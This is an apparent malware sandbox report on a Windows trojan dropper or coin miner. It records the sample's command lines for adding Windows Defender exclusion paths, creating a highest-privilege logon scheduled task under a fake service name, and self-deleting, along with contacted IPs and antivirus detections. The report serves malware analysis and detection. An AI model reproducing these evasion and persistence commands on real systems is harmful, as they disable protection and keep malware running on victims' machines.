Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Sept. 7, 2021, 8:23 a.m. | Sept. 7, 2021, 8:33 a.m. |
-
-
cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
2240-
powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
584 -
powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming'
2948 -
powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\Temp'
1436 -
powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
1396
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\Launcher.exe"
2196-
svchost32.exe C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\Launcher.exe"
2412-
cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
240-
schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
2084
-
-
-
cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
2880-
powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
2892 -
powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming'
2488 -
powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\Temp'
2828
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
2800-
svchost32.exe C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
1744-
cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
1852-
schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
2224
-
-
sihost32.exe "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
2868
-
-
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost32.exe"
192-
choice.exe choice /C Y /N /D Y /T 3
1492
-
-
-
-
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
description | svchost32.exe tried to sleep 121 seconds, actually delayed analysis time by 121 seconds |
file | C:\Windows\System32\Microsoft\Telemetry\sihost32.exe |
file | C:\Users\test22\AppData\Local\Temp\svchost32.exe |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
file | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit |
cmdline | powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\Temp' |
cmdline | C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\Launcher.exe" |
cmdline | schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' |
cmdline | C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe" |
cmdline | "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit |
cmdline | cmd /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit |
cmdline | powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming' |
cmdline | cmd /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe" |
cmdline | "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe" |
cmdline | powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22' |
cmdline | "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\Launcher.exe" |
cmdline | cmd /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost32.exe" |
cmdline | cmd /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\Launcher.exe" |
cmdline | "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost32.exe" |
cmdline | powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows' |
section | {u'size_of_data': u'0x0001a400', u'virtual_address': u'0x00002000', u'entropy': 7.8088248692312945, u'name': u'.text', u'virtual_size': u'0x0001a314'} | entropy | 7.80882486923 | description | A section with a high entropy has been found | |||||||||
entropy | 0.981308411215 | description | Overall entropy of this PE file is high |
cmdline | "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit |
cmdline | schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' |
cmdline | cmd /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit |
cmdline | cmd /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost32.exe" |
cmdline | "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost32.exe" |
host | 104.21.31.210 | |||
host | 104.21.33.188 | |||
host | 104.21.59.252 | |||
host | 154.38.97.90 | |||
host | 172.67.158.82 |
cmdline | "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit |
cmdline | schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' |
cmdline | cmd /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit |
file | C:\Users\test22\AppData\Local\Temp\svchost32.exe |
file | C:\Windows\System32\Microsoft\Telemetry\sihost32.exe |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |
Elastic | malicious (high confidence) |
MicroWorld-eScan | Gen:Variant.Bulz.668351 |
FireEye | Generic.mg.6557d0d59d2e4dee |
McAfee | Artemis!6557D0D59D2E |
Cyren | W64/MSIL_Troj.BCG.gen!Eldorado |
ESET-NOD32 | a variant of MSIL/TrojanDropper.Agent.FHJ |
APEX | Malicious |
Kaspersky | HEUR:Trojan.MSIL.Tasker.gen |
BitDefender | Gen:Variant.Bulz.668351 |
Ad-Aware | Gen:Variant.Bulz.668351 |
McAfee-GW-Edition | BehavesLike.Win64.CoinMiner.cc |
Emsisoft | Gen:Variant.Bulz.668351 (B) |
SentinelOne | Static AI - Malicious PE |
eGambit | Unsafe.AI_Score_99% |
Avira | HEUR/AGEN.1143065 |
Microsoft | Trojan:Win32/Sabsik.FL.B!ml |
GData | Gen:Variant.Bulz.668351 |
Cynet | Malicious (score: 100) |
ALYac | Gen:Variant.Bulz.668351 |
MAX | malware (ai score=82) |
Ikarus | Trojan.MSIL.CoinMiner |
MaxSecure | Trojan.Malware.300983.susgen |
dead_host | 104.21.31.210:443 |
dead_host | 154.38.97.90:8060 |